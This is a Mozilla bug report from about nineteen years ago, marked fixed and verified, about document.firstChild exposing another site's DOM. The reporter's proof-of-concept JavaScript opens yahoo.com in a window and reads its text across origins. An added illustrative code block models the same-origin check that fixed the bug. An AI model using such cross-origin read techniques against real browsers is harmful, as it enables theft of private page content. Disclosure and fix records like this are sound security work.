document.firstChild vulnerability

VERIFIED FIXED in M14

Status


Core
Security
P3
normal
VERIFIED FIXED
19 years ago
18 years ago

People

(Reporter: joro, Assigned: Norris Boyd)

Tracking

Trunk
x86
Windows 95
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

(URL)

(Reporter)

Description

19 years ago
document.firstChild exposes the DOM of an arbitrary document, which at least allows
reading documents.
The code is:
---------------------------------------------------------------------------
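// Recursively concatenate the nodeValue of a node and all of its descendants.
function f(o)
{
  var s = '';
  var i;
  s = o.nodeValue;
  if ( o.childNodes )
    for ( i = 0; i < o.childNodes.length; i++ )
      s += f(o.childNodes[i]);
  return s;
}
// Open a document from another site in a new window.
a = window.open("http://www.yahoo.com", "victim");
function g()
{
  // Cross-site read through document.firstChild (the reported behaviour).
  document.forms[0].elements[0].value = f(a.document.firstChild);
}
// Give the other document time to load before reading it.
setTimeout("g()", 10000);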
---------------------------------------------------------------------------
(Assignee)

Updated

19 years ago
Status: NEW → ASSIGNED
Target Milestone: M14
(Assignee)

Comment 1

19 years ago
This is fixed with my Friday night checkin of all.js.
Status: ASSIGNED → RESOLVED
Last Resolved: 19 years ago
Resolution: --- → FIXED

Updated

19 years ago
QA Contact: junruh → dshea

Updated

19 years ago
Status: RESOLVED → VERIFIED

Comment 2

19 years ago
Windows NT 1999120208 Comm
Verified
...'[Exception... "Security error"'...
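
The check that Comment 2 verifies, modelled as an added example that is not part of the original bug report and is not Mozilla's code. The names `guard`, `sameOrigin`, `collectText`, `tryRead`, the sample tree and the URL `http://other.example/` are all constructed for illustration; the point is that the origin check runs on every property read, so no single property can be left uncovered.

```javascript
// Added illustration: a constructed model, not Mozilla code.
class SecurityError extends Error {}

// Same-origin comparison: scheme, host and port must all match.
function sameOrigin(urlA, urlB) {
  return new URL(urlA).origin === new URL(urlB).origin;
}

// Wrap a document so that EVERY property read is origin-checked (default deny).
// Objects reached through the wrapper are wrapped too, so a check cannot be
// skipped by arriving via a property such as firstChild or childNodes.
function guard(target, docUrl, callerUrl) {
  return new Proxy(target, {
    get(obj, prop) {
      if (!sameOrigin(docUrl, callerUrl)) {
        throw new SecurityError("Security error: " + String(prop));
      }
      const v = obj[prop];
      return v !== null && typeof v === "object" ? guard(v, docUrl, callerUrl) : v;
    },
  });
}

// Constructed sample tree standing in for a loaded document.
const node = (nodeValue, childNodes = []) => ({ nodeValue, childNodes });
const sampleDoc = {
  firstChild: node(null, [node("secret "), node(null, [node("text")])]),
};

// Same recursive walk as f() in the report.
function collectText(o) {
  let s = o.nodeValue || "";
  for (let i = 0; i < o.childNodes.length; i++) s += collectText(o.childNodes[i]);
  return s;
}

// Regression check: returns the text for a same-origin caller, "blocked" otherwise.
function tryRead(docUrl, callerUrl) {
  try {
    return collectText(guard(sampleDoc, docUrl, callerUrl).firstChild);
  } catch (e) {
    if (e instanceof SecurityError) return "blocked";
    throw e;
  }
}
```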

Comment 3

18 years ago
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General